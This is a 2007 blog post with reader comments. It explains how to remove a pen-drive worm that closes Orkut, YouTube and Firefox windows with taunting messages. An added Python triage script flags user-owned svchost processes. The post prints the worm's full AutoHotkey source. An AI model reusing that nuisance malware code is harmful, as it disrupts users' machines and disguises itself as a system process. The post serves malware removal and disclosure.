Monday, May 21, 2007

Firefox-closing worm or virus: easy removal solution

I picked up a worm while using a pen drive at college. It is a rather unique one, as it says

ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??

when you try to open Orkut,

youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did

when you try to open YouTube,

and, most interestingly, does not allow you to use Firefox. However, it is easy to remove. Just go to the Task Manager by pressing the Ctrl+Alt+Del keys together.

Remove all processes that have the name "SVCHOST.exe" and are running under your user name. Don't remove the other SVCHOST.exe processes, such as those running as Local Service, System, etc.

After that, go to

C:\heap41a

select all the contents of that folder and delete them, and your worm is gone. This seems to be a preliminary worm which may later become dangerous. Anyway, for the sake of the record, I am putting up the script I found in it.

And one more thing: it makes that wonderful noise which is supposed to be a laugh! If you find any variants, please let me know.

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return
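
The process check from the removal steps above, written as a small triage script. This is an added example, not part of the original post or of the worm's script; it assumes the English column names of `tasklist /V /FO CSV`, and the sample rows (host name, user, PIDs) are constructed.

```python
import csv
import io

# Built-in service accounts that legitimately host svchost.exe.
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# Constructed sample of `tasklist /V /FO CSV` output (all values are made up).
SAMPLE = r'''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","884","Console","0","4,512 K","Running","NT AUTHORITY\SYSTEM","0:00:03","N/A"
"svchost.exe","1012","Console","0","3,980 K","Running","NT AUTHORITY\NETWORK SERVICE","0:00:01","N/A"
"svchost.exe","1160","Console","0","2,744 K","Running","NT AUTHORITY\LOCAL SERVICE","0:00:00","N/A"
"SVCHOST.exe","2456","Console","0","6,120 K","Running","LABPC\student","0:00:09","N/A"
"svchost.exe","1300","Console","0","3,100 K","Unknown","N/A","0:00:00","N/A"
"firefox.exe","3020","Console","0","48,332 K","Running","LABPC\student","0:01:12","Mozilla Firefox"
'''


def suspicious_svchost(tasklist_csv):
    """Split svchost.exe rows into (flagged, unknown) lists of (pid, user).

    flagged: owned by an ordinary user account, which is what the post
             says to end in Task Manager.
    unknown: owner shown as N/A (tasklist was not run with enough rights),
             so no decision can be made from this listing.
    """
    flagged, unknown = [], []
    for row in csv.DictReader(io.StringIO(tasklist_csv)):
        if row["Image Name"].lower() != "svchost.exe":
            continue  # the image name is compared case-insensitively
        user = row["User Name"].strip()
        entry = (int(row["PID"]), user)
        if user.upper() == "N/A":
            unknown.append(entry)
        elif user.upper() not in SERVICE_ACCOUNTS:
            flagged.append(entry)
    return flagged, unknown


if __name__ == "__main__":
    # On a live Windows host, replace SAMPLE with the text printed by
    # `tasklist /V /FO CSV`.
    flagged, unknown = suspicious_svchost(SAMPLE)
    for pid, user in flagged:
        print(f"svchost.exe PID {pid} runs as {user}: review and end it")
    for pid, _ in unknown:
        print(f"svchost.exe PID {pid}: owner not visible, re-run elevated")
```
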

8 comments:

Anonymous said...

It still seems to be a problem. I can work temporarily after following the steps. But once I restart my computer, the problem starts again. Is it possible to remove that file altogether from whatever place it's in?

Author said...

You can remove the files which are at

C:\heap41a

folder. That should remove the worm permanently. The worm will not come back even after a restart.

Make sure you have a good antivirus and scan your pen drive before use. The worm can come back easily.

Anonymous said...

Try this also:
Remove-Worm.html

Anonymous said...

nagarjun... thanks a lot for your suggestion. I picked up this worm from some site, I feel. I have also been using a pen drive for the last week. Now my system has this problem. I will try to fix it as you said.

Thanks a lot.

Anonymous said...

This procedure doesn't work anymore... Another way of removing this worm (BTW, I found this out while going through the source code, what a dumb mother-f#@!er the creator must be :) ) is by searching for a file called 2.mp3 and deleting the entire source folder, i.e. the folder containing this file. Let me know if it works... Cheers! vivekvivek2001@rediffmail.com

Unknown said...

Thanks a lot, buddy, it helped... a lot.
God bless you.

Anonymous said...

Thanks a ton, buddy, for your help... good job. Thanks a lot.

Anonymous said...

Thanks a lot. It fixed my problem!